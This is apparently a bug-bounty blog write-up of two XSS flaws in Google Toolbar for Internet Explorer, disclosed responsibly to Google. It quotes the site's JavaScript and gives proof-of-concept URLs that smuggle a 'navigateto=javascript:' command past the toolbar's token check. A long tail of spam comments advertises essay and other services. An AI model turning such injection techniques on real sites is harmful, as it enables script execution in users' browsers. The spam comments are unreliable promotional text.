Those bugs are a little unusual. It works only IE which Google Toolbar is installed.
IE's Google Toolbar has some special commands. We can execute from web UI of toolbar.google.com.
For example, you can find the command from: http://toolbar.google.com/fixmenu
<script language="JavaScript"> <!--You can reset toolbar settings when you clicked the button in this page. How does it execute command? Let's take a look at
function command(s) {
window.location = 'http://toolbar.google.com/command?key=' + document.googleToken + s;
}
function fixMenu() {
command('&fixmenu=1');
alert(document.all['restartmessage'].innerText)
}
// -->
</script>
....
<input type=button onclick='javascript:fixMenu()' value="Reset IE's Toolbar menu">
command() function.window.location = 'http://toolbar.google.com/command?key=' + document.googleToken + s;Usually, we will jump to "http://toolbar.google.com/command?..." by this code. But on IE which Google Toolbar is installed, the navigation to "http://toolbar.google.com/command" is treated as special command. To execute command, we will need to put command name to query string. As you can see above page,
fixmenu=1 is associated with the reset settings.document.googleToken is used for CSRF token. document.googleToken is random value which is set by Google Toolbar. If the token is not correct, the command execution will fail. toolbar.google.com is the only domain which can access the token.OK, that's about it.
Examine Toolbar's command
First, to find commands, I explored content on toolbar.google.com and toolbar's binary. Then, I noticednavigateto command. As its name suggests, navigateto command is used for navigation. When I put the following script into IE's developer console on toolbar.google.com, it was actually worked. It took me to example.com.(Note: It seems this command was removed on latest Google Toolbar )
location="http://toolbar.google.com/command?key="+document.googleToken+"&navigateto=http://example.com/"Also I tested javascript: URL.
location="http://toolbar.google.com/command?key="+document.googleToken+"&navigateto=javascript:alert(1)"
Then I got an alert dialog! But It's too early to rejoice because we can't know
document.googleToken from external page. In other words, if an attacker can get document.googleToken, it becomes XSS hole directly.XSS part 1
I went around to resources of toolbar.google.com domain and I found the following page:http://toolbar.google.com/dc/dcuninstall.html (WebArchive)
<script language="JavaScript"> <!--The page has the button which can execute command. If button is clicked, it calls
function command(s) {
window.location = 'http://toolbar.google.com/command?key=' + document.googleToken + s;
}
function OnYes() {
var path = document.location.href.substring(0,document.location.href.lastIndexOf("/") + 1);
command("&uninstall-dc=anyway&DcClientMenu=false&EnableDC=false&navigateto=" + path + "dcuninstalled.html");
// window.location=path + "dcuninstallfailed.html";
}
// -->
</script>
...
<script language="JavaScript"> <!--
document.write('<button default class=button name=yes ');
document.write('onclick="OnYes(); ">Uninstall Google Compute</button>');
// -->
</script>
command("&uninstall-dc=anyway&DcClientMenu=false&EnableDC=false&navigateto=" + path + "dcuninstalled.html"); function via OnYes() function.Let's put command details aside, take a look at the
path variable. The path variable is set by the following line:var path = document.location.href.substring(0,document.location.href.lastIndexOf("/") + 1);It cuts
location.href to use as command string. I believe that the coder expects following bold string:https://toolbar.google.com/dc/dcuninstall.html
But this code is not good. If the URL has
/ in the query or hash, it will cut unexpected URL string.https://toolbar.google.com/dc/dcuninstall.html?xxx/yyy
So, what will happen if we put the following string?
https://toolbar.google.com/dc/dcuninstall.html?&navigateto=javascript:alert(1)//
This URL is assigned into the
path variable and it is used for the part of the command string, like this:
http://toolbar.google.com/command?key=[TOKEN]&uninstall-dc=anyway&DcClientMenu=false&EnableDC=false&navigateto=https://toolbar.google.com/dc/dcuninstall.html?&navigateto=javascript:alert(1)//dcuninstalled.html
There are two
navigateto in this command. In this case, it seems the back string is used as the command. Therefore, the command navigates us to javascript:alert(1)//dcuninstalled.html!!In this way, I have achieved XSS without knowing
document.googleToken.XSS part 2
After that, I found another interesting page:https://toolbar.google.com/buttons/edit/index.html
<script language=JavaScript>Let's take a look at this code.
<!--
document.custom_button_uid = "";
function command(s) {
window.location = "http://toolbar.google.com/command?key=" +
document.googleToken + s;
}
function Load() {
var url = window.document.URL.toString();
var url_pieces = url.split("?");
if (url_pieces.length > 1) {
var params = url_pieces[1].split("&");
var i = 0;
for (i = 0; i < params.length; i++) {
param_pieces = params[i].split("=");
if (param_pieces.length == 2 &&
param_pieces[0] == "custom_button_uri" &&
param_pieces[1].length > 0) {
document.custom_button_uid = unescape(param_pieces[1]);
}
}
}
if (document.custom_button_uid != "") {
action.innerHTML = document.forms[0].edit_mode_title.value;
command("&custom-button-load=" + document.custom_button_uid);
}
}
....
// -->
</script>
<body onload="Load()">
Load() function is called:<body onload="Load()">
Load() function sets document.URL string to url variable:var url = window.document.URL.toString();The query is decomposed and parameter name and value are took out. Then, as you can see the bold string below, the code tries to find
custom_button_uri parameter. If it can find the parameter, it assigns the parameter value to the document.custom_button_uid variable.var url_pieces = url.split("?");
if (url_pieces.length > 1) {
var params = url_pieces[1].split("&");
var i = 0;
for (i = 0; i < params.length; i++) {
param_pieces = params[i].split("=");
if (param_pieces.length == 2 &&
param_pieces[0] == "custom_button_uri" &&
param_pieces[1].length > 0) {
document.custom_button_uid = unescape(param_pieces[1]);
}
}
}
The
document.custom_button_uid variable is passed to command() function:if (document.custom_button_uid != "") {This means that user input is passed into command via the
action.innerHTML = document.forms[0].edit_mode_title.value;
command("&custom-button-load=" + document.custom_button_uid);
}
custom_button_uri query parameter.Let's take a look at the assignment part again:
document.custom_button_uid = unescape(param_pieces[1]);
Fortunately, the
custom_button_uri value passes through unescape() method! This means that we can put urlencoded & and =, like this:https://toolbar.google.com/buttons/edit/index.html?custom_button_uri=%26navigateto%3Djavascript:alert(document.domain)
Finally, the command string is:
http://toolbar.google.com/command?key=[TOKEN]&custom-button-load=&navigateto=javascript:alert(document.domain)
Done!
Rewards
I reported the bugs via Google VRP and I received the reward of $3133.7 × 2.It is not easy to find and understand non-documented commands, but it was a fun time.
And finally, I would like to introduce the holiday gift that I received from Google last year.
(You can find past gifts from: Chromebook, Nexus 10, Nexus 5, Moto 360 )
It is the USB Armory, Bug Bountopoly and post card!
Stephen of Google Security Team gave me the Japanese message and bug hunter's llustration. It's so lovely!
I will continue the bug reports again this year. Thank you so much!
Đặt vé tại Aivivu, tham khảo
ReplyDeletevé máy bay đi Mỹ hạng thương gia
về việt nam từ mỹ
chuyến bay thương mại từ canada về việt nam
Lịch bay từ Hàn Quốc về Việt Nam tháng 7
Hai temanku! Saya ingin mengatakan bahwa posting ini mengagumkan, besar ditulis dan mencakup hampir semua infos signifikan. 토토사이트
ReplyDeleteExcellent website. This blog has taught me a lot. Are you looking for University nursing assignment Help as well? For you, we are the best option. We are well renowned for providing students with affordable nursing essays that do not break the budget.
ReplyDeleteHey people, pay for essay ! We guarantee that every research paper writer on our team is a lenient and friendly professional who’s there for you 24/7, working on the order and looking forward to helping with ongoing homework.
ReplyDeleteEssays should be interactive and interesting. I agree, that people will never build interest in a topic unless and until they read something which really sparks them. I have never built an interest in math’s which is why I always paid someone to do nursing essay topics UK for me. Interest is the key to the essentials of life.
ReplyDeleteOur GED test help service is designed to give students the tools and resources they need to prepare for the test and achieve their highest score.
ReplyDeleteRemarkable! This blog post is truly exceptional. The content is not only informative but also uplifting, leaving me inspired and motivated to explore this valuable resource. The writing style is superb, making the entire read a delightful experience. Thanks for sharing such valuable insights and spreading positivity in the realm of dissertation writing service
ReplyDeleteOne of the key aspects of choosing a Guest house in karachi is its location. Fortunately, the city boasts a plethora of guest houses strategically situated in various neighborhoods, catering to different preferences and needs.
ReplyDeleteSecurity in web applications, like guarding against XSS vulnerabilities, is crucial, just as ensuring reliable stage design is for theater productions. The TAPPS 8 Piece Canvas Flats Set from Palco Specialties offers a solid and secure foundation for any performance, much like how robust code protects against exploits. Both require careful planning and quality components to achieve the best results, whether in tech or the arts.
ReplyDeleteExploring XSS (Cross-Site Scripting) using Google Toolbar's command can reveal critical vulnerabilities in web applications. Similarly, Al Karim Fabric’s Cross Stitch Clothing showcases the importance of attention to detail in design and functionality. Just as secure coding practices protect data, the craftsmanship behind Cross Stitch Clothing ensures high quality and durability. Both require meticulous care to achieve the best results and avoid potential issues.
ReplyDeleteI’m genuinely amazed at how well this writer explained something that typically feels so complex. The way they broke everything down step-by-step made it so much easier to digest. I never thought I’d walk away feeling like I truly understood this topic, but thanks to this piece, I do. Big kudos to the writer for such a fantastic and accessible explanation! Visit our link for ISO Certification in Saudi Arabia
ReplyDeleteInteresting insight into the Google Toolbar XSS vulnerability! It's a reminder of how crucial web security is in protecting users. Visit our link for ISO Certification In Philippines
ReplyDeleteXSS vulnerabilities, like those that can arise with Google Toolbar's commands, highlight the importance of secure coding practices in tech. Learning about such topics can be demanding for students in cybersecurity or programming. If you’re balancing too much and thinking, "Can I pay someone to do my online classes?" Take My Online Exam offers the support you need. Their experts can manage your classes, letting you focus on mastering critical tech skills.
ReplyDeleteCross-Site Scripting (XSS) vulnerabilities, like those involving Google Toolbar commands, are critical to understand in cybersecurity. Exploiting such flaws can lead to security breaches, making it essential for students studying IT and web security to grasp these concepts. Balancing technical assignments can be challenging, so services like UK assignment help provide assignment help UK to support students, allowing them to focus on complex cybersecurity studies effectively.
ReplyDeleteThe discussion on XSS vulnerabilities in tools like Google Toolbar highlights how vital security is in tech and design alike. At Vibrant Colour, we focus on delivering safe and reliable mirror UV printing services in Pakistan, ensuring every project is handled with care and precision. Just as web security is crucial, so is quality control in printing. Our UV printing on mirrors brings unique, vibrant results, combining aesthetics with a meticulous, secure approach to production.
ReplyDelete